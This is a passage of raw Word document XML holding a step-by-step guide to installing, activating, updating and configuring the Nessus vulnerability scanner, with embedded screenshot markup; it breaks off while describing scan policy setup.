        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Download the installation package.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55DE4" w:rsidRPr="00D55DE4" w:rsidRDefault="00D55DE4" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D55DE4" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Install Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2432685" cy="1849037"/>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1UJHEc.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2438207" cy="1853234"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Run the downloaded installer package and follow the on-screen instructions to install Nessus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Choose the installation directory and other necessary settings as prompted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Wait for the installation to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55DE4" w:rsidRPr="00D55DE4" w:rsidRDefault="00D55DE4" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Launch Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Once the installation is complete, you can launch Nessus from the installed location or using the shortcut created during installation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55DE4" w:rsidRPr="00D55DE4" w:rsidRDefault="00D55DE4" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Configure Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="006D5BFE" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2217420" cy="9978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3-07-10 at 17.40.33.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4220" cy="1000899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Open a web browser and access the Nessus web interface by entering the URL provided during installation </w:t>
      </w:r>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(e.g., http://localhost:8834).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>You may be prompted to create an initial administrator account with a username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Follow the on-screen instructions to set up the administrator account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55DE4" w:rsidRPr="00D55DE4" w:rsidRDefault="00D55DE4" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Activate Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008978CF" w:rsidRPr="006F2646" w:rsidRDefault="008978CF" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2636520" cy="11864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3-07-10 at 17.47.29 (1).jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm flipV="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="2645600" cy="1190520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After creating the administrator account, Nessus will prompt you to enter an activation code or use a Nessus Home subscription for activation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>If you have an activation code, enter it as prompted. Otherwise, you can choose to use the Nessus Home subscription, which is free for personal use and limited to scanning a specific number of IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Update Nessus Plugins:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5BFE" w:rsidRPr="006F2646" w:rsidRDefault="006D5BFE" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1871457" cy="1964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xiOPjJ.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1879629" cy="1972632"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Once activated, Nessus will prompt you to update its plugins. This step is essential to ensure that Nessus has the latest vulnerability checks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Allow the update process to complete. It may take some time depending on the speed of your internet connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF6A49" w:rsidRPr="006F2646" w:rsidRDefault="00EF6A49" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF6A49" w:rsidRPr="006F2646" w:rsidRDefault="00EF6A49" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00E83055" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Configure Scan Policies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="00EF6A49" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2926080" cy="1316736"/>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3-07-10 at 17.54.06 (1).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33669" cy="1320151"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00E83055" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After the update process, you can start configuring scan policies based on your requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00E83055" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Navigate to the "Policies" section in the Nessus web interface and create a new policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00E83055" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
